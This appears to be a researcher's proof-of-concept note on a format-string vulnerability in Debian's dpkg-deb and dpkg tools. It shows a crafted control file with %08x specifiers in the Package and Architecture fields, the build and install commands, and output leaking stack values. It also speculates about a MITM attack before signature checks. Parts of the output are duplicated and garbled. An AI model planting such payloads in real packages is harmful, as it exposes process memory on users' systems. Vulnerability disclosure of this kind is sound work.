# dpkg-deb/dpkg-deb --build /var/tmp/ok/
dpkg-deb: warning: parsing file '/var/tmp/ok//DEBIAN/control' near line 2 package 'backup:015fd150.00449f58.00000001.00000001.0000001a\n':
'�D' is not a valid architecture name: %08x.%08x.%08x.%08x.%08x\n
dpkg-deb: warning: ignoring 1 warning about the control file(s)
dpkg-deb: building package `backup:%08x.%08x.%08x.%08x.%08x\n' in `/var/tmp/ok.deb'.
Unsure if signing of the .deb files happens before or after the parsing of the file -- AKA whether or not a MITM attack could be used, if the listing of architecture is done before or after checking of the signature.
I won't be testing that though.
Yep, I'm right.
control file:
Package: backup %08x.%08x. %08x\n
Architecture: %08x.%08x.
Description: Stuff
maintainer: Joshua Rogers
version: 1
# dpkg-deb/dpkg-deb --build /var/tmp/ok/ ok//DEBIAN/ control' near line 2 package 'backup: 015fd150. 00449f58. 00000001. 00000001. 0000001a\ n': %08x.%08x. %08x\n
dpkg-deb: warning: parsing file '/var/tmp/
'�D' is not a valid architecture name: %08x.%08x.
dpkg-deb: warning: ignoring 1 warning about the control file(s)
dpkg-deb: building package `backup: %08x.%08x. %08x.%08x. %08x\n' in `/var/tmp/ok.deb'.
# dpkg -i ok.deb dpkg/available' near line 11413 package 'backup: 017a1e00. 00431828. 00000001. 00000001. 0000001c\ n': %08x.%08x. %08x.%08x\ n
dpkg: warning: parsing file '/var/lib/
'%08x.
Version: 1
Size: 514
Description: Stuff
[....]
(full: http:// pastebin. com/qetcDngk )
Unsure if signing of the .deb files happens before or after the parsing of the file -- AKA whether or not a MITM attack could be used, if the listing of architecture is done before or after checking of the signature.
I won't be testing that though.